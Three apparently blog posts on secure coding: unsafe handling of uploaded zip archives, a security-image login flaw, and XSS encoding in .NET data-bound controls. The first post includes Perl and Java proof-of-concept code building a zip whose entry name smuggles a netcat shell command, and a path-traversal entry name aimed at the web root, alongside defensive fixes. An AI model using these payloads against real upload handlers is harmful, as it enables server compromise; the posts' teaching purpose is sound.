Entries in Secure Coding (3)


Handling Uploaded Archives Securely

Insecure handling of file uploads is one of my favorite issues to test for during web application security assessments. It often provides exploitable attack vectors for compromising the server, the application, and/or end users. In this post, I focus on insecure handling of uploaded archive files, something I've seen repeatedly. In my experience, most applications vulnerable to this flaw do a fairly good job of vetting the uploaded file itself, but fail to apply the same scrutiny to the packaged files. Consider the following PHP code snippet:

Example 1:

if (isFileValidArchive()) {
    $files = getSortedListOfFilesFromValidatedArchive();

    foreach ($files as $filename) {
        $ext = substr($filename, strrpos($filename, '.') + 1);
        // only handle .doc files
        if ($ext == "doc") {
            $cmd = "/usr/bin/unzip -j -o "
                 . "\"" . $filename . "\" -d /tmp/uploads";
            exec($cmd, $output);
            // process results
        }
    }
}

The $filename variable holds the name of a packaged file (such as "somefile.doc") retrieved from an uploaded archive. As usual, blind trust of user-supplied input (here, the name of a file packaged within a user-uploaded .zip file) creates an exploitable attack vector: in this case, arbitrary command execution. Given that the attacker's operating system is likely to forbid certain special characters within a file name, how is this exploitable?

For example, the characters < > : " / \ | ? * are typically forbidden by MS Windows operating systems. These same characters are often useful for manipulating command strings.

To answer the question above: zip compression libraries provide functionality to create and package archives entirely in memory, and in-memory archives are obviously not bound by OS file system constraints. Allowing special characters in a file name is likely not an oversight, as it appears to be in line with the .ZIP File Format Specification. It's also worth noting that the spec permits alternate character encodings, which an attacker could leverage to bypass potential blacklist filtering mechanisms. The following Perl script uses the Chilkat Zip library to exploit the command injection flaw in Example 1.

use chilkat;

# Create a .zip archive in-memory
$zip = new chilkat::CkZip();
$zip->UnlockComponent("anything for 30-day trial");
$zip->NewZip("exploit.zip");

# Package a file with a malicious file name
$zip->AppendString("foo\" & nc -c /bin/sh 8888 & \"bar.doc","junk");

# Write the finished archive to disk, ready for upload
$zip->WriteZipAndClose();
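
The same in-memory trick doesn't require a commercial library. Here is a small, self-contained Java sketch using the standard java.util.zip classes; the hostile entry name is the same payload used in the Perl script above:

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.util.zip.ZipEntry;
import java.util.zip.ZipInputStream;
import java.util.zip.ZipOutputStream;

public class MaliciousZip {
    public static void main(String[] args) throws Exception {
        // Build the archive entirely in memory, so the attacker's own
        // file system never constrains the entry name.
        String payload = "foo\" & nc -c /bin/sh 8888 & \"bar.doc";
        ByteArrayOutputStream buf = new ByteArrayOutputStream();
        try (ZipOutputStream zip = new ZipOutputStream(buf)) {
            zip.putNextEntry(new ZipEntry(payload));
            zip.write("junk".getBytes());
            zip.closeEntry();
        }
        // Read the archive back: the hostile name round-trips untouched.
        try (ZipInputStream in = new ZipInputStream(
                new ByteArrayInputStream(buf.toByteArray()))) {
            System.out.println(in.getNextEntry().getName());
        }
    }
}
```

The `buf.toByteArray()` result is what an attacker would upload; no forbidden-character check ever runs, because no real file is created on the attacker's machine.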

From a security code review perspective, the use of the PHP exec() function in Example 1 should be an immediate red flag (whether you are a security auditor or a developer). In general, shelling out to perform OS commands is never a good idea, especially if the command potentially contains user input.

A safer alternative when building applications is to use native or third-party zip compression APIs, such as the PHP Zip File extension or the Java java.util.zip package. However, even when these are used, developers still find ways to do it insecurely. Consider Example 2, a code snippet from a J2EE web application:

Example 2:

ZipFile zipFile = new ZipFile(uploadedZipFile);

Enumeration<? extends ZipEntry> zipEntries = zipFile.entries();
while (zipEntries.hasMoreElements()) {
    ZipEntry zipEntry = zipEntries.nextElement();
    File packagedFile = new File("/tmp/uploads", zipEntry.getName());
    // Create "packagedFile" on the file system and
    // copy the contents of "zipEntry" into it
}

Again, the attacker controls everything within the zip file. By embedding sequences such as ../ in the name of a packaged file, an attacker can traverse out of "/tmp/uploads" and force the application to write the packaged file to any location, such as the web root directory. A simple "cmd.jsp" file would then allow the attacker to execute arbitrary commands on the web server.
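
The traversal is easy to see in a few lines of Java: resolving a hostile entry name against the extraction directory, as Example 2 does, lands well outside it. The paths below are illustrative:

```java
import java.nio.file.Path;
import java.nio.file.Paths;

public class TraversalDemo {
    public static void main(String[] args) {
        // A hostile entry name supplied inside the uploaded archive
        String entryName = "../../var/www/cmd.jsp";
        // Naive resolution against the extraction directory...
        Path target = Paths.get("/tmp/uploads", entryName).normalize();
        // ...escapes /tmp/uploads entirely
        System.out.println(target);  // /var/www/cmd.jsp
    }
}
```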

How can developers harden their applications so they are not vulnerable to similar mistakes? First, ensure the application is secured with appropriate server-side controls when handling file uploads, i.e.

  • maximum file size enforcement
  • file type and format restrictions
  • random filename assignment
  • virus scanning
  • storing the file into a non-web accessible directory
  • and so on

If archive files are permitted, ensure the same level of stringent validation is also applied to packaged files and, most importantly, never trust user-supplied data elements (such as file names or other file attributes) when determining where and how a file will be stored on the file system.
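
As a sketch of that last point, one possible defensive check in Java (the helper name and paths are mine, not from any particular library) canonicalizes the resolved path and rejects any entry name that escapes the extraction directory:

```java
import java.io.File;
import java.io.IOException;

public class SafeUnzip {
    // Resolve an archive entry name against the extraction directory and
    // reject any name that escapes it (e.g. via "../" sequences).
    static File resolveEntry(File targetDir, String entryName) throws IOException {
        File candidate = new File(targetDir, entryName);
        String prefix = targetDir.getCanonicalPath() + File.separator;
        if (!candidate.getCanonicalPath().startsWith(prefix)) {
            throw new IOException("Entry escapes extraction directory: " + entryName);
        }
        return candidate;
    }

    public static void main(String[] args) throws IOException {
        File dir = new File("/tmp/uploads");
        System.out.println(resolveEntry(dir, "report.doc"));  // accepted
        try {
            resolveEntry(dir, "../../var/www/cmd.jsp");       // rejected
        } catch (IOException e) {
            System.out.println("blocked: " + e.getMessage());
        }
    }
}
```

Note that the check happens on the canonicalized path, after ".." resolution, so simple obfuscations of the traversal sequence do not slip through.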


Yet Another Flawed Authentication Scheme

It seems like every day I hear about a new web-based authentication technique intended to enhance user security and/or thwart phishing scams. This is especially common in the banking world, where most applications are starting to use strong two-factor authentication. Unfortunately for most of the larger consumer web applications, implementing strong multi-factor authentication (i.e. smart cards or SecurID tokens) is just not cost-effective or practical when you have several million users. As a result, these applications must resort to other creative ways to strengthen their authentication.

One increasingly popular practice is the use of security images (known as "watermarks") to thwart phishing scams. For those not familiar with this concept (generically known as site-to-user authentication), it's supposed to work like this:

During registration, the user selects (or is assigned) a specific image. The image is one of potentially hundreds of possible images and is intended to help the user distinguish the real website from an impostor. The actual act of authenticating to the website is split into the following three steps:

  • Step 1: The user submits their username (only) to the website
  • Step 2: The website shows the user their personal "watermark" image, allowing them to verify that they are at the correct site.
  • Step 3: If the watermark image is correct, the user should enter his/her password to complete the login process. If the watermark image is not correct (or not shown), the user should not proceed as they are likely not at the correct website.

The general concept is pretty simple, and was pioneered by PassMark (acquired by RSA/EMC) several years ago. The concept (and PassMark) has been the subject of much scrutiny by both the FFIEC and security researchers in recent years, who have published papers outlining various ways in which this scheme can be abused and subverted. What I find most interesting is that, in addition to all of the potential technical flaws that have been identified with PassMark (and similar concepts), it seems to suffer from an even more critical and fundamental flaw: most users just don't understand it.

A study published earlier this year found that 97% of people who use an image-oriented site-to-user authentication scheme (as described above) still provided their password to an impostor website even though the correct security image was not shown. Even worse, it seems that some of the companies who implement this authentication scheme don't completely understand it. Consider the following real-life example:

Like many folks this holiday season, I found myself at a department store checkout counter faced with the question that every retail clerk is programmed to ask ("Would you like to save an additional 15% today by opening up a new credit card?"). Normally I decline this offer while the clerk is in mid-sentence; however, on this day I proceeded to open an account.

A few days later, I went online to pay my bill and quickly noticed the site touting its *high security* (this seems to be the marketing norm these days). During the registration process, the site forced me to pick a "Security Image" that would be used to protect me from phishing scams (à la PassMark). Knowing how this process is supposed to work, you can imagine my surprise when my subsequent login to the website looked like this:

Screen 1: Login Screen (requesting user-name and password)

Login Page

Screen 2: After authentication (displays my security image)

After Login

What's wrong with these pictures? The site doesn't show me my security image until after I have completely authenticated to the website (instead of before I provide my password)! Clearly there is a lack of understanding and/or education somewhere on the other side.

A quick survey of some non-technical friends and relatives during the holidays also served to further confirm my suspicions. While all of them use at least one banking/bill-pay website that incorporates the use of a security image ("Oh yea, I have a special picture that they show me every time I log in"), not one of them could explain what the image was for or even whether it gets shown to them before or after they provide their password.

The takeaway here is that (not surprisingly) end-user awareness still is, and likely always will be, a fundamental component of the success of any good security measure. There is little point in implementing a new security mechanism (especially one that depends on the user understanding it) unless appropriate steps have been taken to ensure that everyone has been properly educated.


.NET Data-bound Web controls & (anti)XSS - Some Considerations

We spend a lot of time helping clients fix XSS exposures as part of our secure remediation services. One trend we observe repeatedly (and that triggered this post) revolves around the seemingly subconscious trust placed in data pulled from backend databases, combined with a common misconception about many of the .NET data-bound controls.

Often it is not understood where the majority of an application's data originates, or whether it was adequately vetted before being stored. Typically, many different applications, both Internet- and intranet-facing, populate and pull from the same databases. Potentially tainted data is then often simply displayed by the consuming web application, exposing unsuspecting users to XSS attack vectors.

Inconsistent .NET Data-bound control Encoding?!?

Unfortunately, with regard to XSS, many of the .NET data-bound controls (e.g. the DataGrid, DataList, RadioButtonList, and CheckBoxList) perform no encoding when displaying data retrieved from a dynamic data source.

Consequently, this has become a common trap: encoding for certain controls is the responsibility of the developer, and the encoding requirements often vary for each control. This information was only recently captured, in the May 8, 2007 "Comments and Corrections" addendum to the superb Microsoft Patterns & Practices book Improving Web Application Security: Threats and Countermeasures, where the following valid recommendations are made, complete with excellent code examples (which I build upon slightly below):

"For example, for a DataGrid control, you have the following options:

  • Turn all columns into templates and manually use HtmlEncode()/UrlEncode() on each call to DataBinder.Eval
  • Override one of its DataBinding methods, such as OnDatabinding or OnItemDataBound and perform encoding on its items."

HtmlEncode/UrlEncode vs. the Microsoft Anti-Cross Site Scripting Library

The classic solution to fixing/preventing XSS has been to employ the HtmlEncode/UrlEncode utilities (as above) to encode values before they are rendered to users. However, the Microsoft Anti-Cross Site Scripting Library (currently v1.5) warrants heavy consideration for providing enhanced XSS protection in .NET applications. This library provides superior protection by encoding everything except a small set of "known safe" characters. This white-list approach is considered inherently more secure than the classic HtmlEncode and UrlEncode utilities, which encode only known bad items. As there seems to be no end to the creative new ways of exploiting XSS, this tightened protection should be very appealing in .NET environments as part of a multilayer defensive approach. (Remember never to rely on a single security control, as it will nearly always be bypassable under certain conditions.)
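
To make the white-list idea concrete, here is a minimal illustrative sketch (written in Java for brevity, and emphatically not the AntiXss library's actual implementation; the "safe" character set below is an assumption for demonstration). Every character outside the safe set becomes a numeric HTML entity:

```java
public class WhitelistHtmlEncoder {
    // Encode every character outside a small "known safe" set as a
    // numeric HTML entity. This mirrors the white-list philosophy:
    // anything not explicitly trusted is neutralized.
    static String encode(String input) {
        StringBuilder out = new StringBuilder();
        for (int i = 0; i < input.length(); i++) {
            char c = input.charAt(i);
            boolean safe = (c >= 'a' && c <= 'z')
                    || (c >= 'A' && c <= 'Z')
                    || (c >= '0' && c <= '9')
                    || c == ' ' || c == '.' || c == ',' || c == '-' || c == '_';
            if (safe) {
                out.append(c);
            } else {
                out.append("&#").append((int) c).append(';');
            }
        }
        return out.toString();
    }

    public static void main(String[] args) {
        System.out.println(encode("<b>"));          // prints "&#60;b&#62;"
        System.out.println(encode("Hello world.")); // prints "Hello world."
    }
}
```

A blacklist encoder that missed even one dangerous character would fail open; the white-list version fails closed, which is the property that makes this approach attractive.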

A prime example of how version 1.5 of the Microsoft Anti-Cross Site Scripting Library provides greater protection against XSS is the availability of its JavaScriptEncode encoding method, which protects vulnerable application values used directly within existing JavaScript blocks. Such values would still be vulnerable to XSS if they were only subjected to the classic HtmlEncode/UrlEncode utilities. (The XML encoding methods XmlEncode and XmlAttributeEncode are also very useful.) For those who require further information (or are rightly sceptical), the Microsoft ACE Team has an excellent description of the v1.5 enhancements, complete with a tutorial (which has also been endorsed by Microsoft security leader Michael Howard). If you're interested in what's going on under the hood, examine the component yourself via Lutz Roeder's Reflector tool, as Microsoft's David Coe did with an earlier version (among others).

Leveraging AntiXss and DataBinder.Eval to prevent DataGrid XSS

The following example pseudo code shows how the Microsoft Anti-Cross Site Scripting Library could be used manually on each call to DataBinder.Eval to prevent potential XSS exposure.

Pseudo code example 1:

  <asp:datagrid id="grdFoo" CssClass="gridheader" runat="server">
    <Columns>
      <asp:TemplateColumn>
        <ItemTemplate>
          <a name="fooUrl" href='<%# AntiXss.HtmlAttributeEncode(
              DataBinder.Eval(Container.DataItem, "fooUrl").ToString()) %>'>...</a>
        </ItemTemplate>
      </asp:TemplateColumn>
    </Columns>
  </asp:datagrid>

Leveraging OnItemDataBound and AntiXss to prevent DataGrid XSS

The OnItemDataBound method provides the final opportunity to encode the data item to prevent any XSS before it is rendered to the remote user via the ItemDataBound event. The Microsoft Anti-Cross Site Scripting Library could be leveraged by the OnItemDataBound method at this point to encode all data items.

Pseudo code example 2:

  <asp:datagrid id="grdFoo" CssClass="gridheader" runat="server"
      OnItemDataBound="grdFoo_ItemDataBound">
    ...
  </asp:datagrid>


protected void grdFoo_ItemDataBound(object sender,
    DataGridItemEventArgs e)
{
    foreach (TableCell tc in e.Item.Cells)
    {
        if (!string.IsNullOrEmpty(tc.Text) && tc.Text != "&nbsp;")
        {
            tc.Text = AntiXss.HtmlEncode(tc.Text);
        }
    }
}

(Note: be careful not to double-encode any &nbsp; values and blow out the control.)